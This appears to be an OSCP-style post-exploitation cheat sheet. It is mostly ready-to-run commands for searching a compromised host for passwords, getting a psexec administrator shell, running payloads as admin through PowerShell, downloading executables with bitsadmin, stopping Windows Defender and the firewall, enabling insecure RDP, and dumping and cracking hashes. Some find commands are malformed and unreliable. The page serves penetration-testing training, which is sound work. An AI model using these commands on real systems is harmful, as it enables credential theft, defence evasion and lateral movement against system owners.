OSCP
Search…
Post Exploitation
https://sushant747.gitbooks.io/

Post Exploit Enumeration

1
grep -rnw '/' -ie 'pass' --color=always
2
grep -rnw '/' -ie 'DB_PASS' --color=always
3
grep -rnw '/' -ie 'DB_PASSWORD' --color=always
4
grep -rnw '/' -ie 'DB_USER' --color=always
Copied!

File Upload on linux systems via base64 encoding Converting a file to base64:

1
cat file2upload | base64
Copied!
Once the file is converted to base64, you can just create a new file on the remote system and copy the base64 output of the above file into it. Next step would be to reverse the base64 to binary
1
cat fileWithBase64Content | base64 -d > finalBinary
Copied!
You can also use the smbserver.py from Impacket’s repo to host a temporary smb server and fetch files in windows from remote smb servers using the net use command.

PSexec Shells of Remote Systems

1
.\psexec64.exe \192.168.x.x -u .\administrator -p [email protected] cmd.exe
Copied!
Eg: Get cmd.exe shell of remote system with user administrator and password as [email protected]

Powershell Sudo for Windows

There maybe times when you know the creds to admin, but will have a low privileged shell. Unlike Linux, we cannot sudo on windows machines. So, I wrote a simple powershell script for that which can run a separate file as admin. You can run a batch file to add a new superuser or just execute a meterpreter binary as admin. The below command is to be run in a powershell window:
1
2
$pw= convertto-securestring "EnterPasswordHere" -asplaintext -force
3
$pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "EnterDomainName\EnterUserName",$pw
4
$script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat"
5
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process $script -verb Runas}'
Copied!
If however you want to run the powershell from a cmd prompt, you can run store the above command in a xyz.ps1 file and run it in cmd as below:
1
powershell -ExecutionPolicy Bypass -File xyz.ps1
2
Copied!
Download files in Windows with
bitsadmin bitsadmin /transfer mydownloadjob /download /priority normal http:///xyz.exe C:\Users\%USERNAME%\AppData\local\temp\xyz.exe
Disable firewall/defender and enable RDP for all Sometimes you will have the admin creds and may require an RDP Session to find out what exactly is going on in the backend for post exploitation. Below commands will help you disable firewall and enable RDP over insecure connections
1
sc stop WinDefend
2
netsh advfirewall show allprofiles
3
netsh advfirewall set allprofiles state off
4
netsh firewall set opmode disable
5
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
6
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
Copied!
Print files with the line number where the string is found grep -rnw '/' -ie 'password' --color=always

Find files with SUID permission

1
find / -perm -4000 -type f 2>/dev/null
Copied!

Find files with open permissions

1
find / -perm -777 -type f 2>/dev/null
Copied!

Find files with SUID permission for current user

1
find / perm /u=s -user `whoami` 2>/dev/null
2
find / -user root -perm -4000 -print 2>/dev/null
Copied!

Find files with writable permission for current user or current group

1
find / perm /u=w -user `whoami` 2>/dev/null
2
find / -perm /u+w,g+w -f -user `whoami` 2>/dev/null
3
find / -perm /u+w -user `whoami` 2>/dev/nul
Copied!

Find directories with writable permissions for current user or current group

1
find / perm /u=w -type -d -user `whoami` 2>/dev/null
2
find / -perm /u+w,g+w -d -user `whoami` 2>/dev/null
Copied!
In order to move horizontally on the network we need to know as much about the machine as possible. We need to loot it. These are some things that must be done on every compromised machine.

Tcp dump

Who else is connected to the machine?

Dump the hashes

It is always good to have a list of all the hashes and crack them. Maybe someone is reusing the password.

To what is the machine connected?

netstat
ipconfig

Email and personal files

Logs

Last modified 1yr ago